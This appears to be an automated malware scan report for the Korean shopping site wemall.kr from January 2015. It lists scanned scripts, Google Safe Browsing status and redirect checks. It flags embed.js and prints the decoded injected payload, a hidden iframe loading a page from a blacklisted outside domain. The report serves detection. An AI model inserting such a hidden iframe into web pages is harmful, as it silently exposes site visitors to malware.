Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wemall.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wemall.kr/ | 200 OK Content-Length: 54644 Content-Type: text/html | clean |
http://wemall.kr/jscript/common.js | 200 OK Content-Length: 23431 Content-Type: application/x-javascript | clean |
http://wemall.kr/jscript/embed.js | 200 OK Content-Length: 3650 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: devlopasp.ltksolution.com function loadSwf(sUrl, sWidth, sHeight, sId, sAlign, sBgcolor, sWmode) {
if (typeof(sWidth) == "undefined") sWidth = ""; if (typeof(sHeight) == "undefined") sHeight = ""; if (typeof(sId) == "undefined") sId = "ShockwaveFlash"; if (typeof(sAlign) == "undefined") sAlign = ""; if (typeof(sBgcolor) == "undefined") sBgcolor = ""; if (typeof(sWmode) == "undefined") sWmode = "transparent"; var html = '' + '<obje ...[3595 bytes skipped]... Decoded script: <iframe src='http://devlopasp.ltksolution.com/admin/vi/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://wemall.kr/jscript/ajax.js | 200 OK Content-Length: 2460 Content-Type: application/x-javascript | clean |
http://wemall.kr/jscript/json.js | 200 OK Content-Length: 5095 Content-Type: application/x-javascript | clean |
http://wemall.kr/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://wemall.kr/jscript/user_func.js | 200 OK Content-Length: 2643 Content-Type: application/x-javascript | clean |
http://wemall.kr/main/popup_main.js.asp | 200 OK Content-Length: 741 Content-Type: text/html | clean |
http://wemall.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16780 Content-Type: application/javascript | clean |
http://wemall.kr/jscript/floating.js | 200 OK Content-Length: 3865 Content-Type: application/x-javascript | clean |
http://wemall.kr/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://wemall.kr//www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wemall.kr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 26 Jan 2015 11:35:34 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Type: text/html
Expires: Mon, 26 Jan 2015 11:34:34 GMT
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: VISITCHK=T; domain=wemall.kr; path=/
Set-Cookie: PUID=1422304534641741387; domain=wemall.kr; path=/
Set-Cookie: ASPSESSIONIDSARQAQRQ=EJBDAEGCJFFLIKPFJDLEJNDF; path=/
X-Powered-By: ASP.NET
GET / HTTP/1.1
Host: wemall.kr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 26 Jan 2015 11:35:34 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Type: text/html
Expires: Mon, 26 Jan 2015 11:34:34 GMT
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: VISITCHK=T; domain=wemall.kr; path=/
Set-Cookie: PUID=1422304534641741387; domain=wemall.kr; path=/
Set-Cookie: ASPSESSIONIDSARQAQRQ=EJBDAEGCJFFLIKPFJDLEJNDF; path=/
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: wemall.kr
Referer: http://www.google.com/search?q=wemall.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wemall.kr
Referer: http://www.google.com/search?q=wemall.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.